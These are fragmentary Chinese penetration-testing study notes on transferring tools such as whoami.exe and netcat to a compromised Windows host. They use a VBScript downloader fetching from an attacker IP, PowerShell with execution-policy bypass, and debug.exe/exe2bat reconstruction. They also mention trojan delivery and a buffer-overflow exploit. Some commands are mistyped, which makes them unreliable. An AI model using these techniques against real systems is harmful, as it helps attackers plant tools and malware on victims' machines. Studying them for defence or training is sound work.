使用cscript命令调用vbscript脚本,和python差不多
使用cscript命令调用vbscript脚本,和python差不多
vbscript
service apache2 start #开启apache
cd /var/www/html/
cp 路径+whoami.exe .
将命令写入文件
cscript wget.vbs http://ip/whoami.exe w.exe
powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -File wget.ps1
debug
>汇编,反汇编
>16进制dump工具
>限制64k字节
npx -9 nc.exe #压缩nc文件
wine /usr/share/windows-binaries/exe2bat.exe nc.txt #转换成二进制文件
将nc.txt中的命令(除倒数两行)复制到命令行执行
debug<123.hex #debug进行汇编
copy 1.dll nc.exe
mona.py
DEP
多人在线rpg游戏
1.9.0版本接受入站socket连接时存在缓冲区溢出漏洞
edb
网上公开的exp代码
vbscript //win7以前的脚本语言
·service apache2 start
netstat -pantu | grep :80
cd /var/www/html
cp /ftphome/whoami.exe
Powershell
Debug
·汇编、反汇编
·16进制dump工具
·64k字节的传输限制
使用VBScript 传输文件
每一种传输方式 最熟悉场景
VBScript木马
还是需要通过echo吧所有的VBScript的代码指令发送到目标vbs里面 通过vbs执行 通过webhttp协议 下载木马程序 vbs 是windows默认的脚本语言 win7 以前最主要 是 现在增加powrshell
ka
win8 win7 使用powershell 简短的语句实现我们达到的目的
powershell 后缀是ps1
debug文件传输 操作很常用 朱啊哟是汇编反汇编 16dump 有默认字节 64k字节
过程 有限制 当文件比较大 使用upx进行压缩